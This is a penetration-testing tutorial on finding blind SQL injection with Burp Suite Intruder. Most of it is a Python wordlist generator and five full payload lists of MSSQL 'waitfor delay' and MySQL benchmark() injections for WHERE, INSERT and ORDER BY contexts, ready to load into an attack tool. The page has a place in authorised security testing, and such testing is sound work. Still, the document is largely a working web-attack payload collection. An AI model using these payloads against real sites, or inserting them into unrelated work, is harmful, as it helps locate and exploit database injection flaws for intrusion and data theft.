Blind SQL Injection detection with Burp Suite
Published: 2019-06-27

1. Introduction

Burp Suite is local proxy software (a man-in-the-middle application) that helps a penetration tester perform deep analysis and security checks of the HTTP conversation between a browser and a web application. Burp Suite bundles many useful plug-ins such as Spider, Repeater, Scanner, Decoder, … for this job.

The module we focus on is called Intruder. With this plug-in you can run customised attacks against a web application by sending multiple payload types at multiple positions inside the headers/body of an HTTP request, and quickly check the responses that come back.

This article provides some interesting SQL payloads that you can use with the Intruder module of Burp Suite.

Warning: don't use this tutorial against web applications unless you are the owner or have the authorization of the responsible party.

2. SQL Injection detection

As you know, detecting an SQL injection issue "manually" can be easy. That is not always true for an "automatic" vulnerability scanner, so we give such vulnerabilities a second chance to be found with smart "customized attacks" built in Burp Suite Intruder.

To find SQL injection issues behind specific parameters of a page, we simply use the usual time-consuming SQL statements, "waitfor delay" (for MS SQL Server) and "benchmark()" (for MySQL), and sort the HTTP responses by "Response completed". This way the interesting responses surface at the top of the list. Because detection rests on timing alone, a response that is only marginally slower than the rest is not evidence: the injected delay is 20 seconds for waitfor delay, or several seconds of CPU for benchmark(), which stands out clearly from network jitter, and any candidate should be re-sent to confirm that it delays again before it is reported.

3. Burp Suite example

This is a short example of blind SQL injection detection with Burp Suite (we assume you already have some knowledge of Burp Suite usage; if not, enjoy this tool).

First, we send a recorded HTTP request to the Intruder module and mark the position where the payload will be injected (highlighted in red in the screenshot).

Next, we load our payload list (see next section) from a text file. These payloads use the MySQL benchmark() function and ask it to compute MD5(1) 3,000,000 times in order to delay the response.

Important: add a white space to the list "URL-encode these characters" (at the bottom of the Payloads tab) if it is not there already; otherwise the spaces inside the payloads are sent raw in the URL.

Then we start the attack (see the Intruder menu). Run it with a single thread: concurrent requests that all burn CPU on the database server distort each other's timings.

When it has finished, the responses are displayed in a table. Here we have sorted the results by "Response completed" to see immediately which payloads triggered the delay.

As you can see in the screenshot, request 27 took more than 17 seconds to complete with the following payload:

") and 0=benchmark(3000000,MD5(1)) #

The complete SQL statement became the following; the `#` comments out the rest of the original query, including its closing `")`:

SELECT * FROM user WHERE id=("1") AND 0=benchmark(3000000,MD5(1)) #") OR mid="1"

 

4. SQL injection entry points

Because there are so many ways to write an SQL statement, we cannot provide an exhaustive list of payloads for every kind of SQL command and injection issue. We will try to build a good list of valid SQL payloads for the following statements:

4.1. WHERE/ASSIGNMENT

Which should match statements such as:

SELECT a FROM tbl WHERE item=x payload
DELETE FROM tbl WHERE item=x payload
UPDATE tbl SET item1=x payload1 WHERE item2=x payload2
4.2. INSERT/UPDATE

Which should match statements such as:

INSERT INTO tbl(a,b,c) VALUES(x payload1, y payload2)
UPDATE tbl SET a=x payload1, b=y payload2 WHERE item=value
4.3. ORDER BY/ASC/DESC

Which should match statements such as:

SELECT a FROM tbl 
ORDER BY value,payload1 ASC,payload2

5. The Payloads

For now, we focus on MS SQL Server (using the "waitfor delay" command to introduce a time delay) and MySQL (using the benchmark() function to generate long CPU activity).

For each injection, we will:

  • use a quote, a double quote, parentheses or nothing at all to close whatever was written before the injected payload;
  • play with multiple levels of parentheses;
  • end the SQL statement with { /* , -- } for MSSQL, and { /* , -- , # } for MySQL;
  • for INSERT only: try different numbers of columns in VALUES().
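The four rules above are mechanical, so the lists in the next section can be regenerated rather than typed. The following is an added example, not the original author's code, that rebuilds the five payload files from those rules; the delay primitives (waitfor delay, benchmark()) and the comment terminators are the page's, while the function names and the `encode` helper are this example's. Unlike the page's lists, every space and every `#` is URL-encoded consistently, so the result does not depend on Intruder's own URL-encoding setting. The parenthesis depth and column count defaults reproduce the page's files (4 levels for the MySQL WHERE list, 6 for the MSSQL one, up to 8 or 9 NULL columns for INSERT).

```python
"""Rebuild the page's time-based blind SQLi wordlists for Burp Intruder (added example)."""
from __future__ import annotations

from itertools import product

MSSQL_DELAY = "waitfor delay '0:0:20'"     # T-SQL: runs as a second statement in the same batch
MYSQL_DELAY = "benchmark(3000000,MD5(1))"  # MySQL: CPU-bound, always returns 0

TERMINATORS = {"mssql": ("/*", "--"), "mysql": ("/*", "--", "#")}
QUOTES = ("", "'", '"')  # nothing, a single-quoted string, a double-quoted string


def encode(payload: str) -> str:
    """Encode the two characters a raw URL cannot carry: space and '#' (a fragment marker)."""
    return payload.replace(" ", "%20").replace("#", "%23")


def where_payloads(dialect: str, max_parens: int = 4) -> list[str]:
    """WHERE / assignment injection points: quote? + N closing parens + delay + comment."""
    body = MSSQL_DELAY if dialect == "mssql" else f"and 0={MYSQL_DELAY}"
    out = []
    for depth, quote, term in product(range(max_parens + 1), QUOTES, TERMINATORS[dialect]):
        prefix = quote + ")" * depth
        out.append(encode(" ".join(part for part in (prefix, body, term) if part)))
    return out


def insert_payloads(dialect: str, max_columns: int = 9) -> list[str]:
    """INSERT ... VALUES(...) injection points: pad the remaining columns with NULL so the
    VALUES list stays valid, close it, then append the delay."""
    out = []
    for ncols, quote, term in product(range(max_columns + 1), QUOTES, TERMINATORS[dialect]):
        if dialect == "mssql":
            for extra in (0, 1):  # also try one extra ')' in case the value is parenthesised
                prefix = quote + ")" * extra + ",NULL" * ncols + ")"
                out.append(encode(f"{prefix} {MSSQL_DELAY} {term}"))
        else:
            # '+if(benchmark(...),NULL,NULL)' attaches the delay to the injected value itself
            value = f"{quote}+if({MYSQL_DELAY},NULL,NULL)" + ",NULL" * ncols + ")"
            out.append(encode(f"{value} {term}"))
    return out


def order_by_payloads() -> list[str]:
    """ORDER BY injection points (MySQL): an extra sort expression that always delays."""
    expr = f"(select if(count(*)!=-1,{MYSQL_DELAY},{MYSQL_DELAY}))"
    out = []
    for depth, quote, term in product((0, 1), QUOTES, TERMINATORS["mysql"]):
        out.append(encode(f"{quote}{')' * depth},{expr}{term}"))
    return out


# File names follow the page's download; the builders reproduce its depth/column limits.
WORDLISTS = {
    "payloads-sql-blind-MSSQL-INSERT.txt": lambda: insert_payloads("mssql", 8),
    "payloads-sql-blind-MSSQL-WHERE.txt": lambda: where_payloads("mssql", 6),
    "payloads-sql-blind-MySQL-INSERT.txt": lambda: insert_payloads("mysql"),
    "payloads-sql-blind-MySQL-WHERE.txt": lambda: where_payloads("mysql"),
    "payloads-sql-blind-MySQL-ORDER_BY.txt": lambda: order_by_payloads(),
}

if __name__ == "__main__":
    for name, build in WORDLISTS.items():
        payloads = build()
        with open(name, "w") as fh:
            fh.write("\n".join(payloads) + "\n")  # one payload per line, as Intruder expects
        print(f"{name}: {len(payloads)} payloads")
```

Changing MYSQL_DELAY to a different primitive, or raising max_parens when the application nests its own parentheses more deeply, regenerates every list at once; load the resulting file in Intruder's Payloads tab as a simple list.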

5.1. Download

Download the full list of payloads: 

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt
payloads-sql-blind-MSSQL-WHERE.txt
payloads-sql-blind-MySQL-INSERT.txt
payloads-sql-blind-MySQL-WHERE.txt
payloads-sql-blind-MySQL-ORDER_BY.txt

 

payloads-sql-blind-MSSQL-INSERT.txt

)%20waitfor%20delay%20'0:0:20'%20/*
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

payloads-sql-blind-MSSQL-WHERE.txt

waitfor delay '0:0:20' /*
waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
' waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
" waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
)) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
)))) waitfor delay '0:0:20' --
))))) waitfor delay '0:0:20' /*
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' /*
)))))) waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
') waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
") waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
')) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
'))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
"))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
')))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
")))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --

payloads-sql-blind-MySQL-INSERT.txt

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

payloads-sql-blind-MySQL-WHERE.txt

and 0=benchmark(3000000,MD5(1))%20/*
and 0=benchmark(3000000,MD5(1))%20--
and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23

payloads-sql-blind-MySQL-ORDER_BY.txt

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
